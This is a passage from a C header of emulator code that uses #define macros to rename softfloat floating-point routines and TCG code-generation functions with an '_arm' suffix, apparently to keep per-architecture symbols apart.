float16_to_int64_round_to_zero float16_to_int64_round_to_zero_arm #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_arm #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_arm #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_arm #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_arm #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_arm #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_arm #define float16_to_uint16_scalbn float16_to_uint16_scalbn_arm #define float16_to_uint32_scalbn float16_to_uint32_scalbn_arm #define float16_to_uint64_scalbn float16_to_uint64_scalbn_arm #define float32_to_uint16_scalbn float32_to_uint16_scalbn_arm #define float32_to_uint32_scalbn float32_to_uint32_scalbn_arm #define float32_to_uint64_scalbn float32_to_uint64_scalbn_arm #define float64_to_uint16_scalbn float64_to_uint16_scalbn_arm #define float64_to_uint32_scalbn float64_to_uint32_scalbn_arm #define float64_to_uint64_scalbn float64_to_uint64_scalbn_arm #define float16_to_uint16 float16_to_uint16_arm #define float16_to_uint32 float16_to_uint32_arm #define float16_to_uint64 float16_to_uint64_arm #define float32_to_uint16 float32_to_uint16_arm #define float32_to_uint32 float32_to_uint32_arm #define float32_to_uint64 float32_to_uint64_arm #define float64_to_uint16 float64_to_uint16_arm #define float64_to_uint32 float64_to_uint32_arm #define float64_to_uint64 float64_to_uint64_arm #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_arm #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_arm #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_arm #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_arm #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_arm #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_arm #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_arm #define float64_to_uint32_round_to_zero 
float64_to_uint32_round_to_zero_arm #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_arm #define int64_to_float16_scalbn int64_to_float16_scalbn_arm #define int32_to_float16_scalbn int32_to_float16_scalbn_arm #define int16_to_float16_scalbn int16_to_float16_scalbn_arm #define int64_to_float16 int64_to_float16_arm #define int32_to_float16 int32_to_float16_arm #define int16_to_float16 int16_to_float16_arm #define int64_to_float32_scalbn int64_to_float32_scalbn_arm #define int32_to_float32_scalbn int32_to_float32_scalbn_arm #define int16_to_float32_scalbn int16_to_float32_scalbn_arm #define int64_to_float32 int64_to_float32_arm #define int32_to_float32 int32_to_float32_arm #define int16_to_float32 int16_to_float32_arm #define int64_to_float64_scalbn int64_to_float64_scalbn_arm #define int32_to_float64_scalbn int32_to_float64_scalbn_arm #define int16_to_float64_scalbn int16_to_float64_scalbn_arm #define int64_to_float64 int64_to_float64_arm #define int32_to_float64 int32_to_float64_arm #define int16_to_float64 int16_to_float64_arm #define uint64_to_float16_scalbn uint64_to_float16_scalbn_arm #define uint32_to_float16_scalbn uint32_to_float16_scalbn_arm #define uint16_to_float16_scalbn uint16_to_float16_scalbn_arm #define uint64_to_float16 uint64_to_float16_arm #define uint32_to_float16 uint32_to_float16_arm #define uint16_to_float16 uint16_to_float16_arm #define uint64_to_float32_scalbn uint64_to_float32_scalbn_arm #define uint32_to_float32_scalbn uint32_to_float32_scalbn_arm #define uint16_to_float32_scalbn uint16_to_float32_scalbn_arm #define uint64_to_float32 uint64_to_float32_arm #define uint32_to_float32 uint32_to_float32_arm #define uint16_to_float32 uint16_to_float32_arm #define uint64_to_float64_scalbn uint64_to_float64_scalbn_arm #define uint32_to_float64_scalbn uint32_to_float64_scalbn_arm #define uint16_to_float64_scalbn uint16_to_float64_scalbn_arm #define uint64_to_float64 uint64_to_float64_arm #define uint32_to_float64 uint32_to_float64_arm #define uint16_to_float64 uint16_to_float64_arm #define float16_min float16_min_arm #define float16_minnum float16_minnum_arm #define float16_minnummag float16_minnummag_arm #define float16_max float16_max_arm #define float16_maxnum float16_maxnum_arm #define float16_maxnummag float16_maxnummag_arm #define float32_min float32_min_arm #define float32_minnum float32_minnum_arm #define float32_minnummag float32_minnummag_arm #define float32_max float32_max_arm #define float32_maxnum float32_maxnum_arm #define float32_maxnummag float32_maxnummag_arm #define float64_min float64_min_arm #define float64_minnum float64_minnum_arm #define float64_minnummag float64_minnummag_arm #define float64_max float64_max_arm #define float64_maxnum float64_maxnum_arm #define float64_maxnummag float64_maxnummag_arm #define float16_compare float16_compare_arm #define float16_compare_quiet float16_compare_quiet_arm #define float32_compare float32_compare_arm #define float32_compare_quiet float32_compare_quiet_arm #define float64_compare float64_compare_arm #define float64_compare_quiet float64_compare_quiet_arm #define float16_scalbn float16_scalbn_arm #define float32_scalbn float32_scalbn_arm #define float64_scalbn float64_scalbn_arm #define float16_sqrt float16_sqrt_arm #define float32_sqrt float32_sqrt_arm #define float64_sqrt float64_sqrt_arm #define float16_default_nan float16_default_nan_arm #define float32_default_nan float32_default_nan_arm #define float64_default_nan float64_default_nan_arm #define float128_default_nan 
float128_default_nan_arm #define float16_silence_nan float16_silence_nan_arm #define float32_silence_nan float32_silence_nan_arm #define float64_silence_nan float64_silence_nan_arm #define float16_squash_input_denormal float16_squash_input_denormal_arm #define float32_squash_input_denormal float32_squash_input_denormal_arm #define float64_squash_input_denormal float64_squash_input_denormal_arm #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_arm #define roundAndPackFloatx80 roundAndPackFloatx80_arm #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_arm #define int32_to_floatx80 int32_to_floatx80_arm #define int32_to_float128 int32_to_float128_arm #define int64_to_floatx80 int64_to_floatx80_arm #define int64_to_float128 int64_to_float128_arm #define uint64_to_float128 uint64_to_float128_arm #define float32_to_floatx80 float32_to_floatx80_arm #define float32_to_float128 float32_to_float128_arm #define float32_rem float32_rem_arm #define float32_exp2 float32_exp2_arm #define float32_log2 float32_log2_arm #define float32_eq float32_eq_arm #define float32_le float32_le_arm #define float32_lt float32_lt_arm #define float32_unordered float32_unordered_arm #define float32_eq_quiet float32_eq_quiet_arm #define float32_le_quiet float32_le_quiet_arm #define float32_lt_quiet float32_lt_quiet_arm #define float32_unordered_quiet float32_unordered_quiet_arm #define float64_to_floatx80 float64_to_floatx80_arm #define float64_to_float128 float64_to_float128_arm #define float64_rem float64_rem_arm #define float64_log2 float64_log2_arm #define float64_eq float64_eq_arm #define float64_le float64_le_arm #define float64_lt float64_lt_arm #define float64_unordered float64_unordered_arm #define float64_eq_quiet float64_eq_quiet_arm #define float64_le_quiet float64_le_quiet_arm #define float64_lt_quiet float64_lt_quiet_arm #define float64_unordered_quiet float64_unordered_quiet_arm #define floatx80_to_int32 floatx80_to_int32_arm #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_arm #define floatx80_to_int64 floatx80_to_int64_arm #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_arm #define floatx80_to_float32 floatx80_to_float32_arm #define floatx80_to_float64 floatx80_to_float64_arm #define floatx80_to_float128 floatx80_to_float128_arm #define floatx80_round floatx80_round_arm #define floatx80_round_to_int floatx80_round_to_int_arm #define floatx80_add floatx80_add_arm #define floatx80_sub floatx80_sub_arm #define floatx80_mul floatx80_mul_arm #define floatx80_div floatx80_div_arm #define floatx80_rem floatx80_rem_arm #define floatx80_sqrt floatx80_sqrt_arm #define floatx80_eq floatx80_eq_arm #define floatx80_le floatx80_le_arm #define floatx80_lt floatx80_lt_arm #define floatx80_unordered floatx80_unordered_arm #define floatx80_eq_quiet floatx80_eq_quiet_arm #define floatx80_le_quiet floatx80_le_quiet_arm #define floatx80_lt_quiet floatx80_lt_quiet_arm #define floatx80_unordered_quiet floatx80_unordered_quiet_arm #define float128_to_int32 float128_to_int32_arm #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_arm #define float128_to_int64 float128_to_int64_arm #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_arm #define float128_to_uint64 float128_to_uint64_arm #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_arm #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_arm #define float128_to_uint32 float128_to_uint32_arm #define float128_to_float32 
float128_to_float32_arm #define float128_to_float64 float128_to_float64_arm #define float128_to_floatx80 float128_to_floatx80_arm #define float128_round_to_int float128_round_to_int_arm #define float128_add float128_add_arm #define float128_sub float128_sub_arm #define float128_mul float128_mul_arm #define float128_div float128_div_arm #define float128_rem float128_rem_arm #define float128_sqrt float128_sqrt_arm #define float128_eq float128_eq_arm #define float128_le float128_le_arm #define float128_lt float128_lt_arm #define float128_unordered float128_unordered_arm #define float128_eq_quiet float128_eq_quiet_arm #define float128_le_quiet float128_le_quiet_arm #define float128_lt_quiet float128_lt_quiet_arm #define float128_unordered_quiet float128_unordered_quiet_arm #define floatx80_compare floatx80_compare_arm #define floatx80_compare_quiet floatx80_compare_quiet_arm #define float128_compare float128_compare_arm #define float128_compare_quiet float128_compare_quiet_arm #define floatx80_scalbn floatx80_scalbn_arm #define float128_scalbn float128_scalbn_arm #define softfloat_init softfloat_init_arm #define tcg_optimize tcg_optimize_arm #define gen_new_label gen_new_label_arm #define tcg_can_emit_vec_op tcg_can_emit_vec_op_arm #define tcg_expand_vec_op tcg_expand_vec_op_arm #define tcg_register_jit tcg_register_jit_arm #define tcg_tb_insert tcg_tb_insert_arm #define tcg_tb_remove tcg_tb_remove_arm #define tcg_tb_lookup tcg_tb_lookup_arm #define tcg_tb_foreach tcg_tb_foreach_arm #define tcg_nb_tbs tcg_nb_tbs_arm #define tcg_region_reset_all tcg_region_reset_all_arm #define tcg_region_init tcg_region_init_arm #define tcg_code_size tcg_code_size_arm #define tcg_code_capacity tcg_code_capacity_arm #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_arm #define tcg_malloc_internal tcg_malloc_internal_arm #define tcg_pool_reset tcg_pool_reset_arm #define tcg_context_init tcg_context_init_arm #define tcg_tb_alloc tcg_tb_alloc_arm #define tcg_prologue_init tcg_prologue_init_arm #define tcg_func_start tcg_func_start_arm #define tcg_set_frame tcg_set_frame_arm #define tcg_global_mem_new_internal tcg_global_mem_new_internal_arm #define tcg_temp_new_internal tcg_temp_new_internal_arm #define tcg_temp_new_vec tcg_temp_new_vec_arm #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_arm #define tcg_temp_free_internal tcg_temp_free_internal_arm #define tcg_const_i32 tcg_const_i32_arm #define tcg_const_i64 tcg_const_i64_arm #define tcg_const_local_i32 tcg_const_local_i32_arm #define tcg_const_local_i64 tcg_const_local_i64_arm #define tcg_op_supported tcg_op_supported_arm #define tcg_gen_callN tcg_gen_callN_arm #define tcg_op_remove tcg_op_remove_arm #define tcg_emit_op tcg_emit_op_arm #define tcg_op_insert_before tcg_op_insert_before_arm #define tcg_op_insert_after tcg_op_insert_after_arm #define tcg_cpu_exec_time tcg_cpu_exec_time_arm #define tcg_gen_code tcg_gen_code_arm #define tcg_gen_op1 tcg_gen_op1_arm #define tcg_gen_op2 tcg_gen_op2_arm #define tcg_gen_op3 tcg_gen_op3_arm #define tcg_gen_op4 tcg_gen_op4_arm #define tcg_gen_op5 tcg_gen_op5_arm #define tcg_gen_op6 tcg_gen_op6_arm #define tcg_gen_mb tcg_gen_mb_arm #define tcg_gen_addi_i32 tcg_gen_addi_i32_arm #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_arm #define tcg_gen_subi_i32 tcg_gen_subi_i32_arm #define tcg_gen_andi_i32 tcg_gen_andi_i32_arm #define tcg_gen_ori_i32 tcg_gen_ori_i32_arm #define tcg_gen_xori_i32 tcg_gen_xori_i32_arm #define tcg_gen_shli_i32 tcg_gen_shli_i32_arm #define tcg_gen_shri_i32 tcg_gen_shri_i32_arm 
#define tcg_gen_sari_i32 tcg_gen_sari_i32_arm #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_arm #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_arm #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_arm #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_arm #define tcg_gen_muli_i32 tcg_gen_muli_i32_arm #define tcg_gen_div_i32 tcg_gen_div_i32_arm #define tcg_gen_rem_i32 tcg_gen_rem_i32_arm #define tcg_gen_divu_i32 tcg_gen_divu_i32_arm #define tcg_gen_remu_i32 tcg_gen_remu_i32_arm #define tcg_gen_andc_i32 tcg_gen_andc_i32_arm #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_arm #define tcg_gen_nand_i32 tcg_gen_nand_i32_arm #define tcg_gen_nor_i32 tcg_gen_nor_i32_arm #define tcg_gen_orc_i32 tcg_gen_orc_i32_arm #define tcg_gen_clz_i32 tcg_gen_clz_i32_arm #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_arm #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_arm #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_arm #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_arm #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_arm #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_arm #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_arm #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_arm #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_arm #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_arm #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_arm #define tcg_gen_extract_i32 tcg_gen_extract_i32_arm #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_arm #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_arm #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_arm #define tcg_gen_add2_i32 tcg_gen_add2_i32_arm #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_arm #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_arm #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_arm #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_arm #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_arm #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_arm #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_arm #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_arm #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_arm #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_arm #define tcg_gen_smin_i32 tcg_gen_smin_i32_arm #define tcg_gen_umin_i32 tcg_gen_umin_i32_arm #define tcg_gen_smax_i32 tcg_gen_smax_i32_arm #define tcg_gen_umax_i32 tcg_gen_umax_i32_arm #define tcg_gen_abs_i32 tcg_gen_abs_i32_arm #define tcg_gen_addi_i64 tcg_gen_addi_i64_arm #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_arm #define tcg_gen_subi_i64 tcg_gen_subi_i64_arm #define tcg_gen_andi_i64 tcg_gen_andi_i64_arm #define tcg_gen_ori_i64 tcg_gen_ori_i64_arm #define tcg_gen_xori_i64 tcg_gen_xori_i64_arm #define tcg_gen_shli_i64 tcg_gen_shli_i64_arm #define tcg_gen_shri_i64 tcg_gen_shri_i64_arm #define tcg_gen_sari_i64 tcg_gen_sari_i64_arm #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_arm #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_arm #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_arm #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_arm #define tcg_gen_muli_i64 tcg_gen_muli_i64_arm #define tcg_gen_div_i64 tcg_gen_div_i64_arm #define tcg_gen_rem_i64 tcg_gen_rem_i64_arm #define tcg_gen_divu_i64 tcg_gen_divu_i64_arm #define tcg_gen_remu_i64 tcg_gen_remu_i64_arm #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_arm #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_arm #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_arm #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_arm #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_arm #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_arm #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_arm #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_arm #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_arm 
#define tcg_gen_not_i64 tcg_gen_not_i64_arm #define tcg_gen_andc_i64 tcg_gen_andc_i64_arm #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_arm #define tcg_gen_nand_i64 tcg_gen_nand_i64_arm #define tcg_gen_nor_i64 tcg_gen_nor_i64_arm #define tcg_gen_orc_i64 tcg_gen_orc_i64_arm #define tcg_gen_clz_i64 tcg_gen_clz_i64_arm #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_arm #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_arm #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_arm #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_arm #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_arm #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_arm #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_arm #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_arm #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_arm #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_arm #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_arm #define tcg_gen_extract_i64 tcg_gen_extract_i64_arm #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_arm #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_arm #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_arm #define tcg_gen_add2_i64 tcg_gen_add2_i64_arm #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_arm #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_arm #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_arm #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_arm #define tcg_gen_smin_i64 tcg_gen_smin_i64_arm #define tcg_gen_umin_i64 tcg_gen_umin_i64_arm #define tcg_gen_smax_i64 tcg_gen_smax_i64_arm #define tcg_gen_umax_i64 tcg_gen_umax_i64_arm #define tcg_gen_abs_i64 tcg_gen_abs_i64_arm #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_arm #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_arm #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_arm #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_arm #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_arm #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_arm #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_arm #define tcg_gen_exit_tb tcg_gen_exit_tb_arm #define tcg_gen_goto_tb tcg_gen_goto_tb_arm #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_arm #define check_exit_request check_exit_request_arm #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_arm #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_arm #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_arm #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_arm #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_arm #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_arm #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_arm #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_arm #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_arm #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_arm #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_arm #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_arm #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_arm #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_arm #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_arm #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_arm #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_arm #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_arm #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_arm #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_arm #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_arm #define tcg_gen_atomic_fetch_umax_i64 
tcg_gen_atomic_fetch_umax_i64_arm #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_arm #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_arm #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_arm #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_arm #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_arm #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_arm #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_arm #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_arm #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_arm #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_arm #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_arm #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_arm #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_arm #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_arm #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_arm #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_arm #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_arm #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_arm #define simd_desc simd_desc_arm #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_arm #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_arm #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_arm #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_arm #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_arm #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_arm #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_arm #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_arm #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_arm #define tcg_gen_gvec_2 tcg_gen_gvec_2_arm #define tcg_gen_gvec_2i tcg_gen_gvec_2i_arm #define tcg_gen_gvec_2s tcg_gen_gvec_2s_arm #define tcg_gen_gvec_3 tcg_gen_gvec_3_arm #define tcg_gen_gvec_3i tcg_gen_gvec_3i_arm #define tcg_gen_gvec_4 tcg_gen_gvec_4_arm #define tcg_gen_gvec_mov tcg_gen_gvec_mov_arm #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_arm #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_arm #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_arm #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_arm #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_arm #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_arm #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_arm #define tcg_gen_gvec_not tcg_gen_gvec_not_arm #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_arm #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_arm #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_arm #define tcg_gen_gvec_add tcg_gen_gvec_add_arm #define tcg_gen_gvec_adds tcg_gen_gvec_adds_arm #define tcg_gen_gvec_addi tcg_gen_gvec_addi_arm #define tcg_gen_gvec_subs tcg_gen_gvec_subs_arm #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_arm #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_arm #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_arm #define tcg_gen_gvec_sub tcg_gen_gvec_sub_arm #define tcg_gen_gvec_mul tcg_gen_gvec_mul_arm #define tcg_gen_gvec_muls tcg_gen_gvec_muls_arm #define tcg_gen_gvec_muli tcg_gen_gvec_muli_arm #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_arm #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_arm #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_arm #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_arm #define tcg_gen_gvec_smin tcg_gen_gvec_smin_arm #define tcg_gen_gvec_umin tcg_gen_gvec_umin_arm #define tcg_gen_gvec_smax tcg_gen_gvec_smax_arm #define 
tcg_gen_gvec_umax tcg_gen_gvec_umax_arm #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_arm #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_arm #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_arm #define tcg_gen_gvec_neg tcg_gen_gvec_neg_arm #define tcg_gen_gvec_abs tcg_gen_gvec_abs_arm #define tcg_gen_gvec_and tcg_gen_gvec_and_arm #define tcg_gen_gvec_or tcg_gen_gvec_or_arm #define tcg_gen_gvec_xor tcg_gen_gvec_xor_arm #define tcg_gen_gvec_andc tcg_gen_gvec_andc_arm #define tcg_gen_gvec_orc tcg_gen_gvec_orc_arm #define tcg_gen_gvec_nand tcg_gen_gvec_nand_arm #define tcg_gen_gvec_nor tcg_gen_gvec_nor_arm #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_arm #define tcg_gen_gvec_ands tcg_gen_gvec_ands_arm #define tcg_gen_gvec_andi tcg_gen_gvec_andi_arm #define tcg_gen_gvec_xors tcg_gen_gvec_xors_arm #define tcg_gen_gvec_xori tcg_gen_gvec_xori_arm #define tcg_gen_gvec_ors tcg_gen_gvec_ors_arm #define tcg_gen_gvec_ori tcg_gen_gvec_ori_arm #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_arm #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_arm #define tcg_gen_gvec_shli tcg_gen_gvec_shli_arm #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_arm #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_arm #define tcg_gen_gvec_shri tcg_gen_gvec_shri_arm #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_arm #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_arm #define tcg_gen_gvec_sari tcg_gen_gvec_sari_arm #define tcg_gen_gvec_shls tcg_gen_gvec_shls_arm #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_arm #define tcg_gen_gvec_sars tcg_gen_gvec_sars_arm #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_arm #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_arm #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_arm #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_arm #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_arm #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_arm #define vec_gen_2 vec_gen_2_arm #define vec_gen_3 vec_gen_3_arm #define vec_gen_4 vec_gen_4_arm #define tcg_gen_mov_vec tcg_gen_mov_vec_arm #define tcg_const_zeros_vec tcg_const_zeros_vec_arm #define tcg_const_ones_vec tcg_const_ones_vec_arm #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_arm #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_arm #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_arm #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_arm #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_arm #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_arm #define tcg_gen_dupi_vec tcg_gen_dupi_vec_arm #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_arm #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_arm #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_arm #define tcg_gen_ld_vec tcg_gen_ld_vec_arm #define tcg_gen_st_vec tcg_gen_st_vec_arm #define tcg_gen_stl_vec tcg_gen_stl_vec_arm #define tcg_gen_and_vec tcg_gen_and_vec_arm #define tcg_gen_or_vec tcg_gen_or_vec_arm #define tcg_gen_xor_vec tcg_gen_xor_vec_arm #define tcg_gen_andc_vec tcg_gen_andc_vec_arm #define tcg_gen_orc_vec tcg_gen_orc_vec_arm #define tcg_gen_nand_vec 